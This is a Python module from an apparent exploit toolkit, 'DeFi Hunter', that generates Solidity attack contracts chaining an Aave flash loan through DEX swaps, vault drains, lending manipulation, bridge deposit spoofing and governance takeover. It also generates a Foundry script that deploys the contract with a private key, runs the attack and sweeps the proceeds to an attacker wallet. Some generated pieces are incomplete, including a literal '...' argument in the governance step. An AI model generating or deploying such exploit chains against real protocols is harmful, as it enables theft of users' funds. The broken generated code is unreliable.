"""
Cross-Protocol Chaining — chain exploits across multiple protocols.

Chain: Aave → Uniswap → Victim Vault → Profit

Usage:
    from defihunter.core.chaining import ExploitChain

    chain = ExploitChain(rpc_url="https://...")
    chain.add_protocol("aave", address="0x...", type="flash_loan")
    chain.add_protocol("uniswap", address="0x...", type="dex")
    chain.add_protocol("victim", address="0x...", type="vault")
    chain.build()
"""
from __future__ import annotations

import json
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional


@dataclass
class Protocol:
    """A protocol in the exploit chain."""
    name: str
    address: str
    protocol_type: str  # flash_loan, dex, vault, lending, bridge, governance
    params: Dict[str, Any] = field(default_factory=dict)


@dataclass
class ExploitChain:
    """Build a cross-protocol exploit chain."""

    rpc_url: str = ""
    attacker: str = "0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC"
    profit_wallet: str = "0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC"
    protocols: List[Protocol] = field(default_factory=list)

    def add_protocol(self, name: str, address: str, protocol_type: str,
                     **params) -> "ExploitChain":
        """Add a protocol to the chain."""
        self.protocols.append(Protocol(
            name=name,
            address=address,
            protocol_type=protocol_type,
            params=params,
        ))
        return self

    def build(self) -> str:
        """Generate the cross-protocol exploit contract."""
        # Build chain steps
        steps = []
        flash_loan_step = None

        for i, proto in enumerate(self.protocols):
            if proto.protocol_type == "flash_loan":
                flash_loan_step = proto
                steps.append(self._gen_flash_loan(proto, i))
            elif proto.protocol_type == "dex":
                steps.append(self._gen_dex_swap(proto, i))
            elif proto.protocol_type == "vault":
                steps.append(self._gen_vault_drain(proto, i))
            elif proto.protocol_type == "lending":
                steps.append(self._gen_lending_exploit(proto, i))
            elif proto.protocol_type == "bridge":
                steps.append(self._gen_bridge_exploit(proto, i))
            elif proto.protocol_type == "governance":
                steps.append(self._gen_governance_exploit(proto, i))

        steps_body = "\n\n        ".join(steps) if steps else "// No steps defined"

        return f'''// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Auto-generated by DeFi Hunter — Cross-Protocol Exploit Chain
// Protocols: {', '.join(p.name for p in self.protocols)}

interface IERC20 {{
    function balanceOf(address) external view returns (uint256);
    function approve(address, uint256) external returns (bool);
    function transfer(address, uint256) external returns (bool);
}}

interface IAavePool {{
    function flashLoanSimple(
        address receiver,
        address asset,
        uint256 amount,
        bytes calldata params,
        uint16 referralCode
    ) external;
}}

interface IFlashLoanReceiver {{
    function executeOperation(
        address asset,
        uint256 amount,
        uint256 premium,
        address initiator,
        bytes calldata params
    ) external returns (bool);
}}

contract ExploitChain is IFlashLoanReceiver {{
    address constant ATTACKER = {self.attacker};
    address constant PROFIT_WALLET = {self.profit_wallet};

    // Protocol addresses
    {self._gen_constants()}

    uint256 public loanAmount;

    constructor() {{
        loanAmount = 10_000_000 * 1e6;  // Default: 10M USDC
    }}

    function setLoanAmount(uint256 _amount) external {{
        loanAmount = _amount;
    }}

    function attack() external {{
        // Step 1: Get flash loan
        IAavePool({flash_loan_step.address if flash_loan_step else "address(0)"}).flashLoanSimple(
            address(this),
            {flash_loan_step.params.get("token", "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48") if flash_loan_step else "address(0)"},
            loanAmount,
            "",
            0
        );
    }}

    function executeOperation(
        address asset,
        uint256 amount,
        uint256 premium,
        address,
        bytes calldata
    ) external override returns (bool) {{
        require(msg.sender == address(0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2), "Only Aave");

        // --- Exploit Chain ---
        {steps_body}

        // --- Repay Flash Loan ---
        uint256 repayAmount = amount + premium;
        IERC20(asset).approve(msg.sender, repayAmount);

        // --- Sweep Profit ---
        uint256 balance = IERC20(asset).balanceOf(address(this));
        if (balance > repayAmount) {{
            IERC20(asset).transfer(PROFIT_WALLET, balance - repayAmount);
        }}

        return true;
    }}

    receive() external payable {{}}
    fallback() external payable {{}}
}}
'''

    def _gen_constants(self) -> str:
        lines = []
        for p in self.protocols:
            name_upper = p.name.upper()
            lines.append(f"    address constant {name_upper} = {p.address};")
        return "\n".join(lines) if lines else "// No protocol addresses"

    def _gen_flash_loan(self, proto: Protocol, idx: int) -> str:
        token = proto.params.get("token", "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48")
        return f'''// Step {idx}: Flash loan from {proto.name}
        // (handled in attack() function)'''

    def _gen_dex_swap(self, proto: Protocol, idx: int) -> str:
        token_in = proto.params.get("token_in", "USDC")
        token_out = proto.params.get("token_out", "WETH")

        return f'''// Step {idx}: Swap on {proto.name} ({token_in} -> {token_out})
        IERC20({proto.address}).approve({proto.address}, amount);
        (bool success_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature(
                "swap(address,address,uint256,uint256)",
                {token_in}, {token_out}, amount, 1
            )
        );
        require(success_{idx}, "Swap failed on {proto.name}");'''

    def _gen_vault_drain(self, proto: Protocol, idx: int) -> str:
        function = proto.params.get("function", "withdraw")
        amount = proto.params.get("amount", "amount * 2")

        return f'''// Step {idx}: Drain {proto.name}
        (bool success_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature("{function}(uint256)", {amount})
        );
        require(success_{idx}, "Drain failed on {proto.name}");'''

    def _gen_lending_exploit(self, proto: Protocol, idx: int) -> str:
        return f'''// Step {idx}: Exploit lending on {proto.name}
        // Supply collateral, borrow against manipulated price
        (bool success_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature("supply(uint256)", amount / 2)
        );
        require(success_{idx}, "Supply failed");
        (bool success2_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature("borrow(uint256)", amount)
        );
        require(success2_{idx}, "Borrow failed");'''

    def _gen_bridge_exploit(self, proto: Protocol, idx: int) -> str:
        return f'''// Step {idx}: Exploit bridge {proto.name}
        // Spoof deposit without proof
        (bool success_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature("finalize(address,uint256,bytes)", address(this), amount, "")
        );
        require(success_{idx}, "Bridge exploit failed");'''

    def _gen_governance_exploit(self, proto: Protocol, idx: int) -> str:
        return f'''// Step {idx}: Exploit governance on {proto.name}
        // Flash loan tokens, propose + vote
        (bool success_{idx}, ) = {proto.address}.call(
            abi.encodeWithSignature("propose(address[],uint256[],bytes[],string)", ...)
        );
        require(success_{idx}, "Governance exploit failed");'''

    def generate_script(self) -> str:
        """Generate the Foundry deployment script."""
        return f'''// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Script.sol";
import "../contracts/ExploitChain.sol";

contract RunExploitChain is Script {{
    function run() external {{
        uint256 deployerKey = vm.envUint("PRIVATE_KEY");

        vm.startBroadcast(deployerKey);
        ExploitChain exploit = new ExploitChain();
        exploit.setLoanAmount(10_000_000 * 1e6);
        exploit.attack();
        vm.stopBroadcast();

        console.log("Cross-protocol exploit complete!");
    }}
}}'''

    def save(self, output_dir: str = "./chain-exploit") -> Dict[str, str]:
        """Save exploit chain files to disk."""
        from pathlib import Path

        out = Path(output_dir)
        (out / "contracts").mkdir(parents=True, exist_ok=True)
        (out / "scripts").mkdir(parents=True, exist_ok=True)

        files = {}

        # Contract
        contract_path = out / "contracts" / "ExploitChain.sol"
        contract_path.write_text(self.build())
        files["contract"] = str(contract_path)

        # Script
        script_path = out / "scripts" / "run-chain.s.sol"
        script_path.write_text(self.generate_script())
        files["script"] = str(script_path)

        # foundry.toml
        foundry_path = out / "foundry.toml"
        if not foundry_path.exists():
            foundry_path.write_text('''[profile.default]
src = "contracts"
out = "out"
libs = ["lib"]
solc = "0.8.20"
''')
        files["foundry"] = str(foundry_path)

        # Chain diagram
        diagram_path = out / "CHAIN.md"
        diagram = "# Exploit Chain\n\n"
        diagram += "```mermaid\ngraph LR\n"
        for i, p in enumerate(self.protocols):
            diagram += f"    {p.name}[{p.name}]"
            if i < len(self.protocols) - 1:
                diagram += f" --> {self.protocols[i+1].name}"
            diagram += "\n"
        diagram += "```\n\n"
        diagram += "## Protocols\n\n"
        for p in self.protocols:
            diagram += f"- **{p.name}** ({p.protocol_type}): `{p.address}`\n"
        diagram_path.write_text(diagram)
        files["diagram"] = str(diagram_path)

        return files
